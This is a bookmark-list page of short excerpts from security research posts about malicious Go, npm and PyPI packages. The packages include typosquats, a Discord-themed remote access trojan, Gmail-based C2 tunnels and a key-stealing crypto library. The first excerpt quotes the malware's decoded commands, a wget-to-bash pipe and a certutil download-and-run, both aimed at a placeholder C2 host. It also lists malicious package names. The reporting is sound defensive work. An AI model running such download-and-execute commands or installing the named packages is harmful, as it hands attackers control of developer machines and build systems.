Found 9 bookmarks
Custom sorting
11 Malicious Go Packages Distribute Obfuscated Remote Payloads
11 Malicious Go Packages Distribute Obfuscated Remote Payloads
Socket’s Threat Research Team uncovered eleven malicious Go packages, ten of which are still live on the Go Module and eight of which are typosquats, that conceal an identical index-based string obfuscation routine. At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command and control (C2) endpoints, and executes it in memory. Most of the C2 endpoints share the path /storage/de373d0df/a31546bf, and six of the ten URLs are still reachable, giving the threat actor on-demand access to any developer or CI system that imports the packages. The eight packages include the following: github.com/stripedconsu/linker github.com/agitatedleopa/stm github.com/expertsandba/opt github.com/wetteepee/hcloud-ip-floater github.com/weightycine/replika github.com/ordinarymea/tnsr_ids github.com/ordinarymea/TNSR_IDS github.com/cavernouskina/mcp-go github.com/lastnymph/gouid github.com/sinfulsky/gouid github.com/briefinitia/gouid The packages all use an exec.Command("/bin/sh","-c", %3Cobfuscated%3E) construct. The array-driven decoder rebuilds a one-liner that downloads a bash script with wget -O - %3CC2%3E | /bin/bash & on Unix systems, or (2) uses -urlcache -split -f %3CC2%3E %TEMP%\\appwinx64.exe followed by a background start on Windows. Observed second-stage ELF and PE binaries enumerate host information, read browser data, and beacon outbound, often after a first stage triggers a one-hour sleep to evade sandboxes. Because the second-stage payload delivers a bash-scripted payload for Linux systems and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise.
#socket.dev#EN#2025#Supply-Chain-Attack#packages#go#malicious
·socket.dev·
11 Malicious Go Packages Distribute Obfuscated Remote Payloads
Malicious npm Packages Target React, Vue, and Vite Ecosystems with Destructive Payloads
Malicious npm Packages Target React, Vue, and Vite Ecosystems with Destructive Payloads
Malicious npm packages targeting React, Vue, Vite, Node.js, and Quill remained undetected for two years while deploying destructive payloads. Socket's Threat Research Team discovered a collection of malicious npm packages that deploy attacks against widely-used JavaScript frameworks including React, Vue.js, Vite, Node.js, and the open source Quill Editor. These malicious packages have remained undetected in the npm ecosystem for more than two years, accumulating over 6,200 downloads. Masquerading as legitimate plugins and utilities while secretly containing destructive payloads designed to corrupt data, delete critical files, and crash systems, these packages remained undetected. The threat actor behind this campaign, using the npm alias xuxingfeng with a registration email 1634389031@qq[.]com, has published eight packages designed to cause widespread damage across the JavaScript ecosystem. As of this writing, these packages remain live on the npm registry. We have formally petitioned for their removal. Notably, the same account has also published several legitimate, non-malicious packages that function as advertised. This dual approach of releasing both harmful and helpful packages creates a facade of legitimacy that makes malicious packages more likely to be trusted and installed.
#socket.dev#EN#2025#malicious#npm#packages#Supply-Chain-Attack
·socket.dev·
Malicious npm Packages Target React, Vue, and Vite Ecosystems with Destructive Payloads
Malicious PyPI Package Targets Discord Developers with Remot...
Malicious PyPI Package Targets Discord Developers with Remot...
The Socket Research team investigates a malicious Python package disguised as a Discord error logger that executes remote commands and exfiltrates data via a covert C2 channel. On March 21, 2022, a Python package ‘discordpydebug’ was uploaded to the Python Package Index (PyPI) under the name "Discord py error logger." At first glance, it appeared to be a simple utility aimed at developers working on Discord bots using the Discord.py library. However, the package concealed a fully functional remote access trojan (RAT). Over time, the package reached over 11,000 downloads, placing thousands of developer systems at risk. The package targeted developers who build or maintain Discord bots, typically indie developers, automation engineers, or small teams who might install such tools without extensive scrutiny. Since PyPI doesn’t enforce deep security audits of uploaded packages, attackers often take advantage of this by using misleading descriptions, legitimate-sounding names, or even copying code from popular projects to appear trustworthy. In this case, the goal was to lure unsuspecting developers into installing a backdoor disguised as a debugging aid. Discord’s developer ecosystem is both massive and tightly knit. With over 200 million monthly active users, more than 25% of whom interact with third-party apps, Discord has rapidly evolved into a platform where developers not only build but also live test, share, and iterate on new ideas directly with their users. Public and private servers dedicated to development topics foster an informal, highly social culture where tips, tools, and code snippets are shared freely and often used with little scrutiny. It’s within these trusted peer-to-peer spaces that threat actors can exploit social engineering tactics, positioning themselves as helpful community members and promoting tools like discordpydebug under the guise of debugging utilities. The fact that this package was downloaded over 11,000 times, despite having no README or documentation, highlights how quickly trust can be weaponized in these environments. Whether spread via casual recommendation, targeted DMs, or Discord server threads, such packages can gain traction before ever being formally vetted.
#socket.dev#EN#2025#Malicious#PyPI#supply-chain-attack#Discord#discordpydebug
·socket.dev·
Malicious PyPI Package Targets Discord Developers with Remot...
Using Trusted Protocols Against You: Gmail as a C2 Mechanism...
Using Trusted Protocols Against You: Gmail as a C2 Mechanism...
Socket’s Threat Research Team uncovered malicious Python packages designed to create a tunnel via Gmail. The threat actor’s email is the only potential clue as to their motivation, but once the tunnel is created, the threat actor can exfiltrate data or execute commands that we may not know about through these packages. These seven packages: Coffin-Codes-Pro Coffin-Codes-NET2 Coffin-Codes-NET Coffin-Codes-2022 Coffin2022 Coffin-Grave cfc-bsb use Gmail, making these attempts less likely to be flagged by firewalls and endpoint detection systems since SMTP is commonly treated as legitimate traffic. These packages have since been removed from the Python Package Index (PyPI).
#socket.dev#EN#2025#supply-chain-attack#PyPI#Python#packages#malicious#Gmail#tunnel
·socket.dev·
Using Trusted Protocols Against You: Gmail as a C2 Mechanism...
Python Crypto Library Updated to Steal Private Keys
Python Crypto Library Updated to Steal Private Keys
Yesterday, Phylum's automated risk detection platform discovered that the PyPI package aiocpa was updated to include malicious code that steals private keys by exfiltrating them through Telegram when users initialize the crypto library. While the attacker published this malicious update to PyPI, they deliberately kept the package's GitHub repository clean
#phylum#EN#2024#Python#Crypto#Library#PyPI#malicious#code#aiocpa#Supply-chain-attack
·blog.phylum.io·
Python Crypto Library Updated to Steal Private Keys
The evolutionary tale of a persistent Python threat 
The evolutionary tale of a persistent Python threat 
Since early April 2023, an attacker has been relentlessly deploying hundreds of malicious packages through various usernames, accumulating nearly 75,000 downloads. Our team at Checkmarx’s Supply Chain Security has been on this malicious actor’s trail since early April, documenting each step of its evolution. We have been actively observing an attacker who seems to be evermore refining their craft. 
#checkmarx#EN#2023#Supply-chain-attack#malicious#packages#Python
·checkmarx.com·
The evolutionary tale of a persistent Python threat